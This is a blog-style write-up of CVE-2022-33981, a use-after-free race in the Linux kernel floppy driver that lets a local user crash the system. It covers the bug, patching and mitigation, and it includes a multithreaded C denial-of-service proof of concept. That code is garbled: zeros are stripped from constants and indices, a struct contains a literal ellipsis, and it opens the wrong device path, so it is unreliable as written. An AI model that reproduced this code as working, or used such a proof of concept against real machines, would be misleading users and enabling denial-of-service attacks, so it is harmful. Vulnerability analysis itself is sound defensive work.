Recently, cybersecurity experts uncovered a vulnerability in the Linux kernel’s ancient yet still active floppy disk driver (drivers/block/floppy.c). This flaw, tracked as CVE-2022-33981, affects Linux kernels up to version 5.17.5, and it allows an unprivileged local user to crash the system, causing a denial of service (DoS). The bug itself is a concurrency-based use-after-free (UAF) scenario involving the mishandling of the raw_cmd structure in the raw_cmd_ioctl function.
In this article, I’ll break down the technical details in simple terms, show example code for triggering the bug, and link to original sources and patch info.
What is the Vulnerability?
The Linux kernel block floppy driver (drivers/block/floppy.c) processes special IOCTL commands for the legacy floppy disk drive. When a user triggers the FDRAWCMD ioctl (raw_cmd_ioctl function), it allocates a raw_cmd structure, performs various file operations, and finally frees up the structure.
The problem? There’s a race condition here. If another thread or attacker manages to access or operate on the raw_cmd after it’s already freed (but before everything is fully cleaned up), the kernel can attempt to dereference a dangling pointer. This results in a use-after-free bug: a notorious class of memory corruption that can be turned into a denial of service, and potentially even privilege escalation (though in this case, only proven DoS so far).
Here’s the problematic raw_cmd_ioctl function before the patch (simplified for clarity)
static int raw_cmd_ioctl(struct block_device *bdev, fmode_t mode,
unsigned int cmd, unsigned long param)
{
struct raw_cmd *rcmd = kmalloc(sizeof(struct raw_cmd), GFP_KERNEL);
...
/* fill in rcmd's fields based on user input */
...
err = execute_drive_cmd(rcmd);
kfree(rcmd); // <-- rcmd is freed here
...
return err;
}
But elsewhere, rcmd is still being used after being freed—especially if other threads can operate on it at the same time. This makes it a classic use-after-free bug.
Exploit Details
- Attack Vector: A local, unprivileged user can gain access to /dev/fd (the floppy device node), open it, and trigger IOCTLs in parallel threads to race the code and cause the UAF.
- Impact: Kernel crash (DoS). It’s not proven (yet) that anyone can get code execution, but with UAF bugs, it’s not out of the question in the future.
- Fix: Proper locking and memory handling in the kernel was introduced in Linux version 5.17.6 and later.
How Would an Exploit Look?
The following C code snippet shows how such a race condition could be exploited by opening /dev/fd and firing rapid raw IOCTLs from multiple threads:
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <string.h>
#define FDRAWCMD _IOWR(2, x90, struct floppy_raw_cmd)
struct floppy_raw_cmd {
unsigned int flags;
unsigned int length;
unsigned char *data;
...
};
void *trigger_ioctl(void *arg) {
int fd = *(int*)arg;
struct floppy_raw_cmd cmd;
memset(&cmd, , sizeof(cmd));
// Fill fields with fake data
ioctl(fd, FDRAWCMD, &cmd);
return NULL;
}
int main() {
int fd = open("/dev/fd", O_RDWR);
if (fd < ) {
perror("open");
return 1;
}
pthread_t threads[2];
pthread_create(&threads[], NULL, trigger_ioctl, &fd);
pthread_create(&threads[1], NULL, trigger_ioctl, &fd);
pthread_join(threads[], NULL);
pthread_join(threads[1], NULL);
close(fd);
return ;
}
*This code is for educational demonstration ONLY—never run it on a critical system! It should immediately kernel panic or hang older Linux kernels if the floppy driver is loaded.*
Mitigation & Patching
Fix: The secure version adds proper locking around the raw_cmd structure, ensuring it is not freed while in use.
Patched in: Linux kernel 5.17.6 and backported to stable versions.
Temporary mitigation: Remove/blacklist the floppy kernel module if not needed, or restrict permissions on /dev/fd.
References and Further Reading
- CVE-2022-33981 at NVD
- The official Linux kernel patch
- oss-security mailing list post
- Red Hat Security Advisory
- Canonical Ubuntu CVE Tracker
Conclusion
While floppy disks might seem like a relic of the past, legacy code still lives in many systems and can become an unexpected attack surface. CVE-2022-33981 is a good reminder that even obscure, “forgotten” features deserve careful attention. Users and admins should patch their kernels, or at the very least, disable the floppy module if it’s not needed.
If you found this post useful, please share with your sysadmin team and keep your systems protected!
Timeline
Published on: 06/18/2022 16:15:00 UTC
Last modified on: 07/04/2022 11:15:00 UTC